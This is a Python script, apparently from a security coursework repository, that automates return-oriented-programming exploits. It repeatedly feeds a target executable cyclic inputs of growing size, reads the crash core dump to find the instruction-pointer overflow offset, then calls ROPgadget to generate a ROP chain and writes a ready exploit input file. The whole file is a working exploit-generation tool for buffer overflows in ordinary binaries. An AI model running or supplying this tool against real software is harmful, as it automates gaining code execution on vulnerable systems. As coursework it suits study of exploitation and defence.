security-cw/autoRop.py

import argparse
import atexit
import math
import os
import subprocess
import sys
from contextlib import redirect_stderr

from pwnlib.context import context
from pwnlib.elf.corefile import Coredump
from pwnlib.tubes.process import process, signal
from pwnlib.util.cyclic import cyclic, cyclic_find
from pwnlib.util.packing import pack
from pwnlib import atexit as pwnlibexit

# pwnlib has its own version of atexit to do stuff when the program exits, but uses sys.exitfunc
# to do so... unfortunately this was deprecated in python3 so it no longer works!
# either we use python2 or just re-register the pwnlib functions as follows
# why does everything use python2 :(
atexit.register(pwnlibexit._run_handlers)

# delete the corefiles on exit
context.update(delete_corefiles=True)

print(r'''
   _                ___       _.--.  ___        _____          ______ _____          ______ ______ 
\`.|\..----...-'`   `-._.-'_.-'`    / _ \      / ____|   /\   |____  / ____|   /\   |  ____|  ____|
/  ' `         ,       __.--'      | | | |_  _| |       /  \      / / |       /  \  | |__  | |__   
)/' _/     \   `-_,   /            | | | \ \/ / |      / /\ \    / /| |      / /\ \ |  __| |  __|
`-'" `"\_  ,_.-;_.-\_ ',           | |_| |>  <| |____ / ____ \  / / | |____ / ____ \| |    | |____ 
    _.-'_./   {_.'   ; /            \___//_/\_\\_____/_/    \_\/_/   \_____/_/    \_\_|    |______|
   {_.-``-'         {_/
''')

arg_parser = argparse.ArgumentParser(description="Run an automated ROP on an executable")
arg_parser.add_argument("exec_file", metavar="exec_file", type=str, help="The executable file to exploit")
arg_parser.add_argument("rop_file", metavar="rop_file", type=str, help="The name of the generated ROP input file")
arg_parser.add_argument("--min_payload", metavar="min", default=32, type=int, help="The minimum payload length to try")
arg_parser.add_argument("--max_payload", metavar="max", default=16384, type=int, help="The maximum payload length to try")
args = arg_parser.parse_args()

exec_file = args.exec_file
rop_file = args.rop_file
min_payload = args.min_payload
max_payload = args.max_payload

def find_offset(exec_file: str, min_payload: int, max_payload: int):
    input_file = "input.txt"

    payload_size = min_payload
    while payload_size <= max_payload:
        
        print(f"[🤔] Trying payload {payload_size}...")

        with open(input_file, "wb") as f:
            payload = cyclic(payload_size)
            f.write(payload)

        proc = process([f"./{exec_file}", input_file])
        exit_code = proc.poll(block=True)

        if exit_code != 0:
            # ignore the warnings returned by pwnlib, if finding corefile fails then core is None
            with open("/dev/null", "w") as f, redirect_stderr(f):
                core = proc.corefile

            if core is not None and pack(core.eip) in payload:
                offset = cyclic_find(core.eip)
                print(f"[😳] Found offset at {offset}!\n")
                return offset

        payload_size *= 2

    return -1

offset = find_offset(exec_file, min_payload, max_payload)

if offset == -1:
    print(f"[😞] Failed to find offset. Try increasing the payload bounds and ensuring core dumps are enabled!")
    sys.exit(0)

print(f"[🤔] Running ROPgadget with offset {offset}...")
result = subprocess.run(
    [
        "ROPgadget",
        "--binary", exec_file,
        "--ropchain",
        "--silent",
        "--paddingLen", str(offset)
    ], 
    stdout = subprocess.PIPE
)

with open("script.py", "wb") as f:
    f.write(result.stdout)

print(f"[🤔] Running generated script to create ROP input file...")
process(["python3", "script.py", rop_file]).wait()

print(f"[🤩] All done! The ROP input is saved to {rop_file}!")